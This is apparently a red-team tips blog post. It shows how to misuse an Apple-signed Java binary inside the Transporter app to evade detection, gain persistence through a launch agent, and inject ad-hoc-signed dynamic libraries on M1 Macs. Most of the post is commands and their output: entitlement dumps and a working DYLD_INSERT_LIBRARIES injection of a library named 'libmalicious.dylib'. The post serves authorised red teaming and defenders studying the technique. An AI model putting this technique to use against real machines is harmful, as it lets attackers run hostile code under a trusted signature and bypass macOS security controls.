macOS Red Teaming Tricks series
The idea of #macOSRedTeamingTricks series is to share simple & ready-to-use tricks that may help you during macOS red teaming engagements
There were a lot of different code execution & persistence methods on macOS, also those that include delivering your own interpreters/environments like Java. Recently, I found out that Apple’s Transporter app contains a working Java environment. So if you need Java binary signed directly with the Apple Dev-ID certificate go and grab it!
Why it may be useful?
- that Java executable file will look less suspicious because it is signed with the Apple Dev-ID certificate so you may avoid some detections
- you can create for example a launch agent that will execute your jar with the
- it allows injecting adhoc signed dynamic libraries even on M1 Macs
% codesign -d -vv /Applications/Transporter.app/Contents/itms/java/bin/java Executable=/Applications/Transporter.app/Contents/itms/java/bin/java Identifier=net.java.openjdk.cmd Format=Mach-O universal (x86_64 arm64) CodeDirectory v=20500 size=768 flags=0x10000(runtime) hashes=13+7 location=embedded Signature size=4698 Authority=Apple Mac OS Application Signing Authority=Apple Worldwide Developer Relations Certification Authority Authority=Apple Root CA Info.plist entries=4 TeamIdentifier=K36BKF7T3D Runtime Version=11.0.0 Sealed Resources=none Internal requirements count=1 size=220
% codesign -d --entitlements - /Applications/Transporter.app/Contents/itms/java/bin/java Executable=/Applications/Transporter.app/Contents/itms/java/bin/java [Dict] [Key] com.apple.security.cs.debugger [Value] [Bool] true [Key] com.apple.security.cs.allow-jit [Value] [Bool] true [Key] com.apple.security.device.audio-input [Value] [Bool] true [Key] com.apple.security.cs.disable-library-validation [Value] [Bool] true [Key] com.apple.security.cs.allow-dyld-environment-variables [Value] [Bool] true [Key] com.apple.security.cs.allow-unsigned-executable-memory [Value] [Bool] true
Works both on x86 and arm
% lipo -archs /Applications/Transporter.app/Contents/itms/java/bin/java x86_64 arm64
Code injection on M1 :-)
% DYLD_INSERT_LIBRARIES=./libmalicious.dylib /Applications/Transporter.app/Contents/itms/java/bin/java --version 2022-07-11 13:37:00.000 java[9121:59191] [+] Dylib injected openjdk 14.0.2 2020-07-14 OpenJDK Runtime Environment 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8) OpenJDK 64-Bit Zero VM 14.0.2-5906ce1373 (fastdebug build 14.0.2+12-iTunesOpenJDK-8, interpreted mode)